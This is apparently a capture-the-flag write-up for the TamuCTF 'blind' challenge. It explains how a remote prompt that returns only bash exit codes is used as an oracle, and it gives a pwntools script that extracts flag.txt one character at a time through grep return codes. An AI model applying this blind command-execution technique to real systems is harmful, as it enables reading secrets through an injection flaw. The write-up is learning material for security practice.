## blind

* **CTF:** Tamu CTF
* **Category:** misc
* **Points:** 50
* **Author(s):** b0uldrr

---

### Challenge
```
nc challenges.tamuctf.com 3424
```
---

### Solution

Connecting to the remote sever, we are provided with a prompt to execute commands but it only returns numbers. After a bit of research, it appeared that these numbers were [bash exit codes](http://www.tldp.org/LDP/abs/html/exitcodes.html).

* 0 means the program ran and exited successfully
* 1 is a catchall for general errors
* 127 means "command not found" 


Here's an example session:

```
$ nc challenges.tamuctf.com 3424
Execute: ls
0
Execute: whoami
0
Execute: cat flag.txt
0
Execute: aaa 
127
Execute: bbb
127
Execute: grep "test_string" flag.txt
1
Execute: grep "gigem{" flag.txt
0
Execute: 
```

We can see in the example above that `ls` and `whoami` run and return as expected with a 0 return code, whereas `aaa` as a nonsense command returns 127.

Importantly, `cat flag.txt` returns 0, so we know that flag.txt exists. If we run grep on a string in flag.txt, we will get a return code of 0 if the string exists in the file or a 1 if it doesn't. We know that the flag starts with "gigem{", and can see that `grep "gigem{" flag.txt` returns 0. Using this functionality, I wrote a script to brutefore the contents of flag.txt. It starts with a initial known string value of "gigem{" and then loops through every printable character, appends it to the known string value, and greps that string in flag.txt. If the return code is 0, we know that character is the next character in the flag string, so we append it to the known string value and start again with the next character. Here's my script:

```
import pwn

conn = pwn.remote("challenges.tamuctf.com", 3424)

# originally I was using string.printable from the strings library but this was messing up the grep command when it send the "*" command, which is a wildcard in grep
chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '}', '_']

# seed the flag with the starting text or else our grep function may return a positive for a string in the middle of the flag
flag = "gigem{"

# keep going until the last character added to the flag string was "}"
while flag[-1] != "}":
    for c in chars:
        conn.recvuntil("Execute: ")
        command = 'grep "' + flag + c + '" flag.txt'
        conn.sendline(command)

        # decode the raw bytes we received into a unicode string and then remove trailing whitespace
        result = conn.recvline().decode().strip()

        # debugging prints
        print("Command:", command)
        print("Result :", result)
        print()

        # our search string was found in flag.txt. Append the newly found character to our flag string and start on the next one
        if(result == "0"):
            flag += c
            break

print(flag)
``` 
---

### Flag 
```
gigem{r3v3r53_5h3ll5}
```
